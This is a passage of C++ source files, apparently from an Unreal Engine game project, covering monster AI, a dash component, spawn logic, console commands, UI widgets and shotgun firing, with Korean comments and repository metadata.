수정\n\tGetMesh()->SetRelativeLocationAndRotation(FVector(0.0f, 0.0f, -88.0f), FRotator(0.0f, -90.0f, 0.0f));\n#endif\n\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n\n\tCharScaleComponent = CreateDefaultSubobject<UPG_ComponentCharScale>(TEXT(\"CHARSCALECOMPONENT\"));\n\n\t// 플레이어 오버랩 이벤트 설정\n\tGetCapsuleComponent()->OnComponentBeginOverlap.AddDynamic(this, &APG_MonChar::OnCharacterHit);\n\tGetCapsuleComponent()->OnComponentHit.AddDynamic(this, &APG_MonChar::OnHitCallback);\n\n#ifdef ENABLE_DRAW_DEBUG\n\tHPBarWidget = CreateDefaultSubobject<UWidgetComponent>(TEXT(\"HPBARWIDGET\"));\n\tHPBarWidget->SetupAttachment(GetMesh());\n\tHPBarWidget->SetRelativeLocation(FVector(0.0f, 0.0f, 180.0f));\n\tHPBarWidget->SetWidgetSpace(EWidgetSpace::Screen);\n\tstatic ConstructorHelpers::FClassFinder<UUserWidget> UI_HUD(TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_HPBar.WB_HPBar_C'\"));\n\tif (UI_HUD.Succeeded())\n\t{\n\t\tHPBarWidget->SetWidgetClass(UI_HUD.Class);\n\t\tHPBarWidget->SetDrawSize(FVector2D(50.0f, 50.0f));\n\t}\n#endif\n\n\tm_fMaxHP = 0.0f;\n}\n\n// Called when the game starts or when spawned\nvoid APG_MonChar::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n#ifdef ENABLE_DRAW_DEBUG\n\tif (HPBarWidget)\n\t\tHPBarWidget->SetHiddenInGame(true);\n#endif\n\n\tABCHECK(SetDefaultMonsterData());\n\n\tABCHECK(CharScaleComponent);\n\tCharScaleComponent->SetActorScaleRange(m_vBeginScale * MonsterData->MBodyScale, m_vBeginScale);\n\tSetHP(MonsterData->MHP);\n\n\tABCHECK(RunAI());\n}\n\nvoid APG_MonChar::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\tm_vBeginScale = GetCapsuleComponent()->GetComponentScale();\n}\n\nvoid APG_MonChar::FellOutOfWorld(const class UDamageType& dmgType)\n{\n\tif (dmgType.bCausedByWorld)\n\t\tSetDie(false);\n\telse\n\t\tSuper::FellOutOfWorld(dmgType);\n}\n\n// Called every frame\nvoid APG_MonChar::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tUpdateRotation(DeltaTime);\n}\n\n// Called to bind functionality to input\nvoid APG_MonChar::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)\n{\n\tSuper::SetupPlayerInputComponent(PlayerInputComponent);\n}\n\nvoid APG_MonChar::UpdateRotation(float DeltaTime)\n{\n\t// 몬스터가 움직이지 않고 캐릭터 방향으로 회전해야하는 경우\n\tif (m_bDoNotMoving && false == m_bDoNotRotation)\n\t{\n\t\tAPG_MyChar* pPG_MyChar = FindTargetToMyChar();\n\t\tif (pPG_MyChar)\n\t\t{\n\t\t\tFRotator PlayerRot = UKismetMathLibrary::FindLookAtRotation(GetActorLocation(), pPG_MyChar->GetActorLocation());\n\t\t\tFRotator rotator = FMath::RInterpTo(m_vTargetRotation, PlayerRot, DeltaTime, MonsterData->MRotateSpeed);\n\t\t\trotator.Pitch = 0.0f;\n\t\t\tm_vTargetRotation = rotator;\n\t\t\tSetActorRotation(rotator);\n\t\t}\n\t\telse\n\t\t{\n\t\t\tm_vTargetRotation = GetActorRotation();\n\t\t}\n\t}\n}\n\nvoid APG_MonChar::OnCharacterHit(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp,\n\tint32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto PlayerCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (PlayerCharacter)\n\t{\n\t\t//ABLOG(Warning, TEXT(\"Attack Actor : %s\"), *GetName());\n\t\tPlayerCharacter->OnAttackedByMonster();\n\t\treturn;\n\t}\n}\n\nvoid APG_MonChar::OnHitCallback(UPrimitiveComponent* HitComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\n}\n\nbool APG_MonChar::RunAI()\n{\n\tAIController = Cast<APG_AICon_Mon>(GetController());\n\tif (nullptr == AIController)\n\t{\n\t\tSpawnDefaultController();\n\t\tAIController = Cast<APG_AICon_Mon>(GetController());\n\t}\n\n\tABCHECK(nullptr != AIController, false);\n\n\treturn AIController->RunAI();\n}\n\nvoid APG_MonChar::StopAI()\n{\n\tABCHECK(nullptr != AIController);\n\tAIController->StopAI();\n}\n\nvoid APG_MonChar::SetHP(int32 nHP)\n{\n\tMonsterData->MHP = nHP;\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\tUProgressBar* HPProgressBar = Cast<UProgressBar>(HPBarWidget->GetUserWidgetObject()->GetWidgetFromName(TEXT(\"PB_HPBar\")));\n//\tif (HPProgressBar)\n//\t{\n//\t\tHPProgressBar->SetPercent(GetHPRatio());\n//\t}\n//#endif\n\n\tif (CharScaleComponent)\n\t\tCharScaleComponent->SetActorScale(GetHPRatio());\n}\n\nvoid APG_MonChar::SetDie(bool IsUseLetharAttack)\n{\n\tAPG_GameStateStage* AGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (AGameStateStage)\n\t{\n\t\tAGameStateStage->MonsterDie(this, IsUseLetharAttack);\n\t\tDestroy();\n\t}\n\telse\n\t{\n\t\tABLOG_S(Warning);\n\t}\n}\n\nconst FPGMonsterData* APG_MonChar::GetMonsterData()\n{\n\treturn MonsterData;\n}\n\nint32 APG_MonChar::GetDetectRange() const\n{\n\treturn MonsterData ? MonsterData->MDetectRange : 0;\n}\n\nint32 APG_MonChar::GetChaseRange() const\n{\n\treturn MonsterData ? MonsterData->MChaseRange : 0;\n}\n\nfloat APG_MonChar::GetHPRatio() const\n{\n\tABCHECK(MonsterData, 0.0f);\n\n\treturn (MonsterData->MHP <= 0) ? 0.0f : ((float)MonsterData->MHP / (float)m_fMaxHP);\n}\n\nfloat APG_MonChar::GetMaxHP() const\n{\n\treturn m_fMaxHP;\n}\n\nfloat APG_MonChar::GetDropRate() const\n{\n\treturn MonsterData ? MonsterData->MDropRate : 0.0f;\n}\n\nAPG_MyChar* APG_MonChar::FindTargetToMyChar()\n{\n\tauto pMyChar = Cast<APG_MyChar>(GetWorld()->GetFirstPlayerController()->GetCharacter());\n\tABCHECK(nullptr != pMyChar, nullptr);\n\n\tFVector vMonLocation = GetActorLocation();\n\tFVector vPlayerLocation = pMyChar->GetActorLocation();\n\n\tif (FMath::Abs<int32>(FVector::Distance(vMonLocation, vPlayerLocation)) <= GetDetectRange())\n\t\treturn pMyChar;\n\n\treturn nullptr;\n}\n\nbool APG_MonChar::SetDefaultMonsterData()\n{\n\tABCHECK(nullptr != MonsterData, false);\n\n\tbUseControllerRotationYaw = false;\n\t\n\tm_bDoNotRotation = (0.0f >= MonsterData->MRotateSpeed);\n\tm_bDoNotMoving = (0.0f >= MonsterData->MSpeed);\n\tGetCharacterMovement()->bOrientRotationToMovement = !m_bDoNotRotation;\n\tGetCharacterMovement()->bUseControllerDesiredRotation = !m_bDoNotRotation;\n\tif (false == m_bDoNotRotation)\n\t\tGetCharacterMovement()->RotationRate = FRotator(0.0f, MonsterData->MRotateSpeed, 0.0f);\n\tGetCharacterMovement()->MaxWalkSpeed = MonsterData->MSpeed;\n\tGetCharacterMovement()->MaxAcceleration = MonsterData->MAcceleration;\n\n\n\t// 콜리전 설정\n\tif (MonsterData->MCollide)\n\t\tGetCapsuleComponent()->SetCollisionProfileName(TEXT(\"Monster\"));\n\telse\n\t\tGetCapsuleComponent()->SetCollisionProfileName(TEXT(\"Monster_NoCollide\"));\n\n\tm_fMaxHP = MonsterData->MHP;\n\tSetHP(MonsterData->MHP);\n\n\treturn true;\n}\n\nvoid APG_MonChar::OnAssetLoadCharacterCompleted()\n{\n\tABCHECK(AssetStreamingHandle.IsValid());\n\n\tUSkeletalMesh* AssetLoaded = Cast<USkeletalMesh>(AssetStreamingHandle->GetLoadedAsset());\n\tAssetStreamingHandle.Reset();\n\tABCHECK(nullptr != AssetLoaded);\n\tGetMesh()->SetSkeletalMesh(AssetLoaded);\n\n\n\tAIController = Cast<APG_AICon_Mon>(GetController());\n\tABCHECK(nullptr != AIController);\n\n\tif (false == AIController->RunAI())\n\t{\n\t\tABLOG(Warning, TEXT(\"AIController RunAI Failed!!\"));\n\t}\n}\n\nbool APG_MonChar::OnDamage(int32 nDamage, bool IsUseLetharAttack/* = false*/)\n{\n\tSetHP(MonsterData->MHP - nDamage);\n\n\tif (MonsterData->MHP <= 0.0f)\n\t{\n\t\t// Die\n\t\tSetDie(IsUseLetharAttack);\n\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nvoid APG_MonChar::DebugOnly()\n{\n\t//if (ChangeMonsterData)\n\t//{\n\t//\tif (ID != MonsterData.ID)\n\t//\t{\n\t//\t\tauto PGGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t//\t\tABCHECK(nullptr != PGGameInstance);\n\t//\t\tconst FPGMonsterData* pMonsterData = PGGameInstance->GetMonsterData(MonsterType, MonsterData.ID);\n\t//\t\tif (pMonsterData)\n\t//\t\t{\n\t//\t\t\tMonsterData = *pMonsterData;\n\t//\t\t\tAssetLoadCharacter(pMonsterData->MMeshPath->GetPathName());\n\t//\t\t}\n\t//\t}\n\n\t//\tSetDefaultMonsterData(&MonsterData);\n\t//\tChangeMonsterData = false;\n\t//}\n}" }, { "alpha_fraction": 0.6215469837188721, "alphanum_fraction": 0.6215469837188721, "avg_line_length": 23.965517044067383, "blob_id": "579a6b6666785cbe7e350cf94d5aa25113a3c94d", "content_id": "f36766f1ed38532738c1274688fe76d338a26705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1544, "license_type": "no_license", "max_line_length": 95, "num_lines": 58, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetStageFailed.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetStageFailed.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetStageFailed : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tbool IsAbleViewStagePlayAD();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateClearStageLayout();\n\t\npublic:\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnRetry();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGoToMainLobby();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoSucessed();\t// 스테이지 플레이형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoClosed();\t// 스테이지 플레이형 광고를 닫거나 실패하였음\n\t//============================================================================================\n\nprivate:\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveFlag;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveFlag;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveTime;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveTime;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveLethal;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveLethal;\n};\n" }, { "alpha_fraction": 0.770652174949646, "alphanum_fraction": 0.770652174949646, "avg_line_length": 23.891891479492188, "blob_id": "945c81e54242056abe27dab5fb0dad9e81e15067", "content_id": "19d9433dd4997ac836a22ce480a3ba7d4a3bcd38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 922, "license_type": "no_license", "max_line_length": 119, "num_lines": 37, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_Command.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"Game/Console/Commands/PG_Command.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\nPG_Command::PG_Command()\n{\n}\n\nPG_Command::~PG_Command()\n{\n}\n\nvoid PG_Command::Init(IConsoleVariable* pConsoleVariable)\n{\n\tABCHECK(nullptr != pConsoleVariable);\n\n\tm_pConsoleVariable = pConsoleVariable;\n\tm_pConsoleVariable->AsVariable()->SetOnChangedCallback(FConsoleVariableDelegate::CreateStatic(&OnUpdateConsoleValue));\n}\n\nvoid PG_Command::OnUpdateConsoleValue(IConsoleVariable* pConsoleVariable)\n{\n\tABCHECK(nullptr != G_PGWorld);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pConsole = pGameInstance->GetConsole();\n\tABCHECK(nullptr != pConsole);\n\n\tauto pCommand = pConsole->GetCommand(pConsoleVariable);\n\tABCHECK(nullptr != pCommand);\n\n\tpCommand->OnChangeCommand();\n}" }, { "alpha_fraction": 0.7345132827758789, "alphanum_fraction": 0.7362831830978394, "avg_line_length": 23.042552947998047, "blob_id": "4f76ba7b9d44b5a61bba13c9f0d42ba6f35101b4", "content_id": "78f103d812d630a44b9445f6605a94d64e11c9a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2360, "license_type": "no_license", "max_line_length": 122, "num_lines": 94, "path": "/Source/Project_Gun/Private/Character/Component/PG_ComponentDash.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/Component/PG_ComponentDash.h\"\n#include \"Character/PG_Char.h\"\n\n// Sets default values for this component's properties\nUPG_ComponentDash::UPG_ComponentDash()\n{\n\t// Set this component to be initialized when the game starts, and to be ticked every frame. You can turn these features\n\t// off to improve performance if you don't need them.\n\tPrimaryComponentTick.bCanEverTick = true;\n}\n\n\n// Called when the game starts\nvoid UPG_ComponentDash::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\t// ...\n\t\n}\n\n\n// Called every frame\nvoid UPG_ComponentDash::TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction)\n{\n\tSuper::TickComponent(DeltaTime, TickType, ThisTickFunction);\n\n\tUpdateDashLocation(DeltaTime);\n}\n\nbool UPG_ComponentDash::SetupDashData(FVector vDashTargetPos, float fMoveDistance, float fDashSpeed)\n{\n\tauto AOwner = Cast<APG_Char>(GetOwner());\n\tABCHECK(nullptr != AOwner, false);\n\tABCHECK(false == vDashTargetPos.IsZero(), false);\n\n\tm_fDashSpeed = fDashSpeed;\n\t// 대쉬 방향 계산\n\tm_vDashDir = vDashTargetPos - AOwner->GetActorLocation();\n\tm_vDashDir.Normalize();\n\n\tm_vGoalPos = AOwner->GetActorLocation() + (m_vDashDir * fMoveDistance);\n\n\t// 타겟 방향으로 몬스터 회전\n\tAOwner->SetActorRotation(m_vDashDir.Rotation());\n\n\treturn true;\n}\n\nvoid UPG_ComponentDash::StartDash()\n{\n\tm_bActiveDash = true;\n}\n\nvoid UPG_ComponentDash::StopDash()\n{\n\tm_bActiveDash = false;\n\tm_fDashSpeed = 0.0f;\n\tm_vDashDir = FVector::ZeroVector;\n\tm_vGoalPos = FVector::ZeroVector;\t// 최종 이동 목표지점\n\tOnDashEnd.Broadcast();\n}\n\nbool UPG_ComponentDash::IsDash()\n{\n\treturn m_bActiveDash;\n}\n\nvoid UPG_ComponentDash::UpdateDashLocation(float fDeltaTime)\n{\n\tif (false == m_bActiveDash)\n\t\treturn;\n\n\tauto AOwner = Cast<APG_Char>(GetOwner());\n\tif (nullptr == AOwner)\n\t{\n\t\tm_bActiveDash = false;\n\t\tABCHECK(nullptr != AOwner);\n\t}\n\n\tFVector vLocation = AOwner->GetActorLocation();\n\tFVector vPos = FMath::VInterpTo(vLocation, m_vGoalPos, fDeltaTime, m_fDashSpeed);\n\t// 어느정도 목표지점에 들어오면 대쉬가 끝났다는걸 알린다.\n\tif (10 >= FMath::Abs<float>(FVector::Distance(vLocation, m_vGoalPos)))\n\t{\n\t\tOnDashEnd.Broadcast();\n\t\treturn;\n\t}\n\n\tAOwner->SetActorLocation(vPos);\n\tAOwner->AddMovementInput(m_vDashDir);\n}\n" }, { "alpha_fraction": 0.7692692875862122, "alphanum_fraction": 0.7702702879905701, "avg_line_length": 29.75384521484375, "blob_id": "5ffd0de935271864a89620cd6c8c5c52327c46b2", "content_id": "63492df839da29363d590e3389cc824d534e46b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2038, "license_type": "no_license", "max_line_length": 195, "num_lines": 65, "path": "/Source/Project_Gun/Private/BlueScriptObject/Target/PG_TargetSpot.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Target/PG_TargetSpot.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n\n// Sets default values\nAPG_TargetSpot::APG_TargetSpot()\n{\n \t// Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = false;\n\n\tTrigger = CreateDefaultSubobject<UBoxComponent>(TEXT(\"TRIGGER\"));\n\tBox = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"BOX\"));\n\tPortalEffect = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"PORTALEFFECT\"));\n\n\tRootComponent = Trigger;\n\tBox->SetupAttachment(RootComponent);\n\n\t// 콜리전 설정\n\tTrigger->SetCollisionProfileName(TEXT(\"TargetSpot\"));\n\tTrigger->OnComponentBeginOverlap.AddDynamic(this, &APG_TargetSpot::OnPlayerOverlap);\n\n\tBox->SetCollisionProfileName(TEXT(\"NoCollision\"));\n\n\t// 파티클 설정\n\tPortalEffect->SetupAttachment(RootComponent);\n\tPortalEffect->bAutoActivate = true;\n}\n\n// Called when the game starts or when spawned\nvoid APG_TargetSpot::BeginPlay()\n{\n\tSuper::BeginPlay();\n\t\n\tAPG_GameStateStage* AGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (AGameStateStage)\n\t\tAGameStateStage->GateOpenDelegate.AddUObject(this, &APG_TargetSpot::OnGateOpen);\n}\nvoid APG_TargetSpot::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\n// Called every frame\nvoid APG_TargetSpot::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n}\n\nvoid APG_TargetSpot::OnPlayerOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromSweep, const FHitResult& SweepResult)\n{\n\tABLOG_S(Warning);\n\n\t// 스테이지 클리어 검사\n\tauto AMyCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (AMyCharacter && GetWorld())\n\t{\n\t\tAPG_GameStateStage* AGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\t\tif (AGameStateStage)\n\t\t{\n\t\t\tAGameStateStage->OnCheckStageClear();\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.6495956778526306, "alphanum_fraction": 0.6567834615707397, "avg_line_length": 32.727272033691406, "blob_id": "e54a19c67ee1b8d5a4a6145779c25a00da1efc1c", "content_id": "44797ba1fe6461ae9520f39b87a28f56aad773be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2536, "license_type": "no_license", "max_line_length": 122, "num_lines": 66, "path": "/Source/Project_Gun/Public/Character/Component/PG_ComponentDivisionSpawn.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Components/ActorComponent.h>\n#include \"PG_ComponentDivisionSpawn.generated.h\"\n\n\nUCLASS( ClassGroup=(Custom), meta=(BlueprintSpawnableComponent) )\nclass PROJECT_GUN_API UPG_ComponentDivisionSpawn : public UActorComponent\n{\n\tGENERATED_BODY()\n\npublic:\t\n\t// Sets default values for this component's properties\n\tUPG_ComponentDivisionSpawn();\n\nprotected:\n\t// Called when the game starts\n\tvirtual void BeginPlay() override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction) override;\n\n\t//=================================================================================================\n\t// DivisionSpawnActor : Owner 액터 기준 주위로 원형 모양으로 nDvisionCount만큼 동일한 액터를 Spawn 시킨다.\n\t// nDvisionCount : 생성할 액터 수\n\t// vRange : Spawn될 액터는 Owner의 중점으로부터 vRange 만큼 떨어져서 배치된다. (=반지름 값)\n\t//=================================================================================================\n\ttemplate<class T>\n\tbool DivisionSpawnActor(int32 nDvisionCount, FVector vRange)\n\t{\n\t\tABCHECK(0 < nDvisionCount, false);\n\n\t\tUWorld* World = GetWorld();\n\t\tABCHECK(nullptr != World, false);\n\n\t\tauto Owner = Cast<T>(GetOwner());\n\t\tABCHECK(nullptr != Owner, false);\n\n\t\tfloat fDivDgree = 360.0f / (float)nDvisionCount;\n\t\tFVector vRadius = Owner->GetActorForwardVector() * vRange;\t\t// 액터 스폰 범위값\n\t\tFVector vLocation = Owner->GetActorLocation();\n\t\tvLocation.Z += 100.0f;\t// 생성된 액터가 하늘에서 떨어지는 효과를 내기위한 보정값\n\n\t\tfor (int n = 1; n <= nDvisionCount; n++)\n\t\t{\n\t\t\tFVector vSpawnPos = vLocation + vRadius.RotateAngleAxis(fDivDgree * n, FVector::UpVector);\n\t\t\tauto ASpawnActor = World->SpawnActor<T>(Owner->GetClass(), vSpawnPos, Owner->GetActorRotation());\n\t\t\tif (nullptr == ASpawnActor)\n\t\t\t{\n\t\t\t\t// 콜리전으로 인해 생성되지 못한 액터는 Owner 머리 위로 스폰할 수 있게 한다.\n\t\t\t\t// 추후에 물리엔진을 이용해서 머리 위로 스폰되면 미끄러지면서 퍼지는 물리를 찾아봐야 할 것 같다.\n\t\t\t\tvLocation.Z += 300.0f;\n\t\t\t\tASpawnActor = World->SpawnActor<T>(Owner->GetClass(), vLocation, Owner->GetActorRotation());\n\t\t\t}\n\t\t\t//ABCHECK(nullptr != ASpawnActor, false);\n\t\t\tOwner->OnSpawnActor(ASpawnActor);\n\t\t}\n\n\t\treturn true;\n\t}\n};\n" }, { "alpha_fraction": 0.7631774544715881, "alphanum_fraction": 0.764290988445282, "avg_line_length": 29.280899047851562, "blob_id": "75708999e3bdc396eecf56831581f602d017633c", "content_id": "a2262f8b1892589b5f147bd8ac86ff9756283870", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2770, "license_type": "no_license", "max_line_length": 124, "num_lines": 89, "path": "/Source/Project_Gun/Private/BlueScriptObject/Weapon/PG_WeaponShotgun.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Weapon/PG_WeaponShotgun.h\"\n#include \"BlueScriptObject/Projectile/PG_ProjectileShutgun.h\"\n#include \"Character/PG_MonChar.h\"\n\n\nAPG_WeaponShotgun::APG_WeaponShotgun()\n{\n\n}\n\nvoid APG_WeaponShotgun::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tif (FiringEffect)\n\t{\n\t\tFName SocketFire(TEXT(\"Socket_FiringEffect\"));\n\t\tFiringEffect->AttachToComponent(Weapon, FAttachmentTransformRules::SnapToTargetNotIncludingScale, SocketFire);\n\t\tFiringEffect->SetActive(false, true);\n\t\tFiringEffect->bAutoActivate = false;\n\t}\n}\n\nvoid APG_WeaponShotgun::Destroyed()\n{\n\tSuper::Destroyed();\n}\n\nvoid APG_WeaponShotgun::Fire()\n{\n\tfor (int32 nIndex = 0; nIndex < eMax_ShotgunProjectile; ++nIndex)\n\t{\n\t\tFName\t\tSocketFire(*FString::Printf(TEXT(\"Socket_Fire_%d\"), nIndex));\n\t\tFVector\t\tvLocation = Weapon->GetSocketLocation(SocketFire);\n\t\tFRotator\trRotation = Weapon->GetSocketRotation(SocketFire);\n\n\t\tUWorld* World = GetWorld();\n\t\tif (World)\n\t\t{\n\t\t\tFActorSpawnParameters SpawnParams;\n\t\t\tSpawnParams.Owner = this;\n\t\t\tSpawnParams.Instigator = GetInstigator();\n\n\t\t\t// 총구 위치에 발사체를 스폰시킵니다.\t\t\n\t\t\tCurrFireShutgun = World->SpawnActor<APG_Projectile>(WeaponData.BProjectile, vLocation, rRotation, SpawnParams);\n\t\t\tABCHECK(nullptr != CurrFireShutgun);\n\n\t\t\t// 발사 방향을 알아냅니다.\n\t\t\tFVector LaunchDirection = rRotation.Vector();\n\n\t\t\t// 몬스터가 사용하는 무기 여부\n\t\t\tbool bMonsterWeapon = (nullptr != Cast<APG_MonChar>(GetOwner()));\n\n\t\t\tCurrFireShutgun->FireInDirection(GetWeaponData(), LaunchDirection, bMonsterWeapon);\n\t\t\t//CurrFireShutgun->AttachToActor(this, FAttachmentTransformRules::SnapToTargetNotIncludingScale);\n\t\t}\n\t}\n\n\tauto pFiringEffect = NewObject<UParticleSystemComponent>(Weapon, UParticleSystemComponent::StaticClass());\n\tif (pFiringEffect)\n\t{\n\t\tFName SocketFire(TEXT(\"Socket_FiringEffect\"));\n\t\tFVector\t\tvLocation = Weapon->GetSocketLocation(SocketFire);\n\t\tFRotator\trRotation = Weapon->GetSocketRotation(SocketFire);\n\n\t\tpFiringEffect = UGameplayStatics::SpawnEmitterAtLocation(GetWorld(), FiringEffect->Template, vLocation, rRotation, false);\n\t\tpFiringEffect->bAutoActivate = false;\n\t\tpFiringEffect->bAutoDestroy = true;\n\t\tpFiringEffect->Activate(true);\n\t\tpFiringEffect->OnSystemFinished.AddDynamic(this, &APG_WeaponShotgun::OnFiringEffectEndParticle);\n\t}\n\n\tif (FireSound)\n\t\tFireSound->Play();\n}\n\nvoid APG_WeaponShotgun::StopFire()\n{\n\t//if (FiringEffect && FiringEffect->IsActive())\n\t//\tFiringEffect->SetActive(false);\n}\n\nvoid APG_WeaponShotgun::OnFiringEffectEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\t//if (ParticleSystemComponent)\n\t//\tParticleSystemComponent->DestroyComponent();\n}" }, { "alpha_fraction": 0.7448789477348328, "alphanum_fraction": 0.7448789477348328, "avg_line_length": 24.595237731933594, "blob_id": "08c4c47dee2aa9b5e91923faeb879876a0b930a8", "content_id": "d304cc65777819b79bd7612776eb117468e848f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1076, "license_type": "no_license", "max_line_length": 116, "num_lines": 42, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandSetTargetStageID.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n#include \"Game/Console/Commands/PG_CommandSetTargetStageID.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\nPG_CommandSetTargetStageID::PG_CommandSetTargetStageID()\n{\n}\n\nPG_CommandSetTargetStageID::~PG_CommandSetTargetStageID()\n{\n}\n\nvoid PG_CommandSetTargetStageID::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandSetTargetStageID::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tauto pGameMdoe = Cast<APG_GameModeBase>(G_PGWorld->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMdoe);\n\n\tif (false == pGameMdoe->SetPlayStageID(m_pConsoleVariable->GetInt()))\n\t{\n\t\tABLOG(Warning, TEXT(\"There is no corresponding stage information. (StageID ; %d)\"), m_pConsoleVariable->GetInt());\n\t}\n\n\tABLOG(Warning, TEXT(\"You have finished setting up for that stage. (StageID ; %d)\"), m_pConsoleVariable->GetInt());\n}\n\nvoid PG_CommandSetTargetStageID::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.7501587867736816, "alphanum_fraction": 0.7545419931411743, "avg_line_length": 28.046125411987305, "blob_id": "8a3d686d530e2f96df27f07d92a167ccf0312fb7", "content_id": "86be2ecf33cd97865dc117056bdf6392f02b19d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 15902, "license_type": "no_license", "max_line_length": 176, "num_lines": 542, "path": "/Source/Project_Gun/Private/Game/GameMode/PG_GameModeBase.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"SaveData/PG_SaveStageData.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include 